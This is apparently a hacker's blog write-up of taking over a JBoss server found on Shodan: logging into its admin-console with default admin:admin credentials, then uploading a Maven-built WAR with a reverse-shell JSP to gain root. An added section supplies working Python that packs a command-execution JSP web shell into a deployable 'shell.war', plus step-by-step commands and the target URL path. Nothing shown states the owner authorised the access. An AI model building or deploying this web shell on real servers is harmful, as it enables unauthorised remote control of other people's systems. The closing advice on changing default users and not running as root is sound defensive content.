JBOSS :: From Default Creds to RCE

How we got there

Hello guys,

In the world of cybersecurity, uncovering vulnerabilities and exploiting them to gain remote access to a system is a challenge that many ethical hackers undertake. In this blog post, I'll walk through, step by step, how I found a path to Remote Code Execution (RCE) through a WAR file upload in a JBoss admin panel.

The Discovery

It all began with the discovery of an IP address on Shodan, a popular search engine for discovering internet-connected devices and services. I stumbled upon an IP that piqued my interest.

Uncovering the Redirect

Upon further investigation, it became apparent that the IP address in question hosted a web panel that redirected users to another location. That redirect was the entry point for the rest of the work.

Default Credentials

The next step was research on JBoss AS (Application Server) instances. Familiarizing myself with JBoss, I found that default credentials are often the weak link: the admin-console shipped with the server is frequently left with its stock admin:admin account. This led to a critical breakthrough: access to the admin panel.

Exploration

With access to the admin panel, I explored the environment to get a feel for its structure, its deployed components, and potential vulnerabilities. Panels like this are juicy: the JBoss admin-console lets an authenticated user deploy new applications, which is all that is needed for code execution.

The Quest for Web Shell

The goal was to get a web shell onto the server to enable further exploitation. Various methods, including uploading bare JSP files and JSP files zipped into WAR format, were attempted but yielded no results. (A WAR is more than a zipped JSP: the container expects a WEB-INF/web.xml deployment descriptor alongside the JSP, which is exactly what a Maven-built project provides.)

A New Approach

Looking for another route, I came across the idea of generating a Java/JSP web application with Maven, which produces a correctly structured WAR. This approach provided a fresh perspective on gaining the desired RCE.

Following the Tutorial

Taking a "Hello World" JSP tutorial as the starting point, I replaced the innocuous "Hello World" code with my reverse-shell code in the JSP file.

Building the Web App

Using Maven, I built the web application with my modified JSP file. This marked a significant step toward the goal. The next challenge was to upload the newly created WAR file containing the modified web application to the target server through the admin panel.

Triumph: Remote Code Execution => root

Finally, the moment of truth arrived. After successfully uploading the WAR file, I achieved my objective: Remote Code Execution (RCE) on the target system. I now had control of and access to the server, a remarkable result after a series of diligent steps and persistent effort. Better still, the JBoss process had been started as root, so my shell ran as root too.

Reproduction Steps

  1. visited the webapp at https://xboy.me:8080
  2. found the panel was redirecting to xboy.me
  3. visited https://xboy.me:8080/admin-console/ and got redirected to https://xboy.me:8080/admin-console/login.seam?conversationId=14
  4. entered the default creds admin:admin

Build

  1. installed maven and java (lovely tutorial here => https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu )
  2. created the default hello world webapp skeleton with maven
     mvn archetype:generate -DgroupId=com.example -DartifactId=example-application -DarchetypeArtifactId=maven-archetype-webapp -DinteractiveMode=false
  3. replaced the default hello world code in index.jsp with the malicious (reverse shell) JSP
     nano example-application/src/main/webapp/index.jsp
     (screenshot: hello-world)
  4. built the web app via maven to get a correctly structured war file under target/
     cd example-application/ && mvn package
     (screenshot: build)
  5. went back to the panel, uploaded the war as a new web application, and I was golden
  6. ran a few commands (id, env) and found I was root
     (screenshot: id env)
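To show what the container actually needs inside a WAR (and why the zipped-JSP attempts failed while the Maven build worked), here is an added example in Python that is not part of the original post and is not the author's reverse-shell JSP. It packs a constructed, parameterised command-execution JSP next to a minimal WEB-INF/web.xml, reproduces the descriptor-less "zipped JSP" variant, and checks an archive for the things a servlet-2.5 container such as JBoss AS 5/6 requires before it will deploy. The output file name, context root and host in the comments are placeholders.

```python
import io
import zipfile

# Constructed example JSP: a parameterised command shell (not the author's
# reverse-shell JSP; the post does not reproduce that file).
# Once deployed it is reached at http://<host>:8080/<context>/index.jsp?cmd=id
CMD_SHELL_JSP = r"""<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    if (cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader r = new BufferedReader(
            new InputStreamReader(p.getInputStream()));
        String line;
        while ((line = r.readLine()) != null) {
            out.println(line);
        }
    }
%>
"""

# Minimal servlet-2.5 deployment descriptor. This is the piece a plain zip of
# a JSP lacks; the Maven webapp archetype generates one for you.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="2.5">
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>
"""


def build_war(jsp_source: str, jsp_name: str = "index.jsp") -> bytes:
    """Return the bytes of a deployable WAR: the JSP plus WEB-INF/web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
        war.writestr("WEB-INF/web.xml", WEB_XML)
    return buf.getvalue()


def zip_only_jsp(jsp_source: str, jsp_name: str = "index.jsp") -> bytes:
    """The 'zip a JSP and rename it .war' attempt from the post: no descriptor."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_names(war_bytes: bytes) -> list:
    """Sorted entry names of the archive; raises zipfile.BadZipFile if not a zip."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as z:
        return sorted(z.namelist())


def war_problems(war_bytes: bytes) -> list:
    """List what would stop a servlet-2.5 container from deploying this archive.
    An empty list means the layout looks deployable."""
    try:
        names = set(war_names(war_bytes))
    except zipfile.BadZipFile:
        return ["not a zip archive"]
    problems = []
    if "WEB-INF/web.xml" not in names:
        problems.append("missing WEB-INF/web.xml")
    # Files under WEB-INF/ are never served directly, so the shell must sit
    # outside it to be reachable by URL.
    if not any(n.endswith(".jsp") and not n.startswith("WEB-INF/") for n in names):
        problems.append("no JSP outside WEB-INF/ (nothing would be URL-reachable)")
    return problems


if __name__ == "__main__":
    # Placeholder file name; JBoss uses the name minus .war as the context root.
    with open("shell.war", "wb") as f:
        f.write(build_war(CMD_SHELL_JSP))
    print("wrote shell.war (context root /shell)")
    print("zip-only attempt:", war_problems(zip_only_jsp(CMD_SHELL_JSP)))
```

The checker is also a quick triage aid for the failure mode in the post: a `.war` that is really just a zipped JSP reports "missing WEB-INF/web.xml", which is why it never became reachable. On the defensive side, the two things that turned this into root were the stock admin-console credentials and a JBoss process started as root; changing or disabling the default users and running the server as an unprivileged service account remove both.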

Contacts

@github @twitter @LinkedIn @Intigriti @hackerone_old
